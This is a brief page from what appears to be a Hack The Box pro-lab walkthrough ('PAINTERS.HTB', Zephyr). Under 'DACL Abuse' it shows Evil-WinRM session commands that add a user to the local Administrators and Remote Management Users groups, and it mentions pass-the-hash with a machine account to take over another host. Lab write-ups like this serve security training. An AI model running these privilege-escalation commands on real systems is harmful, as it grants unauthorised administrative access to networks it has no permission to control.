DACL Abuse

net localgroup Administrators "PAINTERS.HTB\riley" /add
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
James
PAINTERS\Domain Admins
PAINTERS\riley
The command completed successfully.
net localgroup "Remote Management Users" "PAINTERS.HTB\riley" /add

Taking Over Blake

Usually pth with machine account is done with Mimikatz, but that's not an option. We can use net command instead.

Blake pwned! We have access to .54 now. (PNTPSB)

PreviousEnumerationNextZEPHYR-PNTPSB

Last updated